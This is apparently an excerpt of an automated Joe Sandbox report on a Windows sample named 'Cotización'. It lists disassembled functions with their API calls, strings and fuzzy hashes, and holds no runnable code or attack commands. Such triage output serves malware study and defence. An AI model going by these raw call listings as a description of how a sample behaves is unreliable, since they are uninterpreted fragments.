                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                • API String ID: 1976180769-4113822522
                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                • String ID:
                • API String ID: 461458858-0
                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                • CloseHandle.KERNEL32(00000000), ref: 00430113
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                • GlobalFree.KERNEL32(00000000), ref: 00430150
                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                • DeleteObject.GDI32(?), ref: 004301D0
                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                • String ID:
                • API String ID: 3969911579-0
                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                • String ID: 0
                • API String ID: 956284711-4108050209
                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                • String ID: 0.0.0.0
                • API String ID: 1965227024-3771769585
                • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: SendString$_memmove_wcslen
                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                • API String ID: 369157077-1007645807
                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                APIs
                • GetParent.USER32 ref: 00445BF8
                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                • __wcsicoll.LIBCMT ref: 00445C33
                • __wcsicoll.LIBCMT ref: 00445C4F
                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wcsicoll$ClassMessageNameParentSend
                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                • API String ID: 3125838495-3381328864
                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                APIs
                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$CharNext
                • String ID:
                • API String ID: 1350042424-0
                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                APIs
                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                • _wcscpy.LIBCMT ref: 004787E5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                • API String ID: 3052893215-2127371420
                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                • __swprintf.LIBCMT ref: 0045E7F7
                • _wprintf.LIBCMT ref: 0045E8B3
                • _wprintf.LIBCMT ref: 0045E8D7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-2354261254
                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __swprintf_wcscpy$__i64tow__itow
                • String ID: %.15g$0x%p$False$True
                • API String ID: 3038501623-2263619337
                • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                • __swprintf.LIBCMT ref: 0045E5F6
                • _wprintf.LIBCMT ref: 0045E6A3
                • _wprintf.LIBCMT ref: 0045E6C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-8599901
                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                APIs
                • timeGetTime.WINMM ref: 00443B67
                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                • SetActiveWindow.USER32(00000000), ref: 00443BEC
                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                • IsWindow.USER32(00000000), ref: 00443C3A
                • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                • String ID: BUTTON
                • API String ID: 1834419854-3405671355
                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                • LoadStringW.USER32(00000000), ref: 00454040
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • _wprintf.LIBCMT ref: 00454074
                • __swprintf.LIBCMT ref: 004540A3
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                • API String ID: 455036304-4153970271
                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                APIs
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                • _memmove.LIBCMT ref: 00467EB8
                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                • _memmove.LIBCMT ref: 00467F6C
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
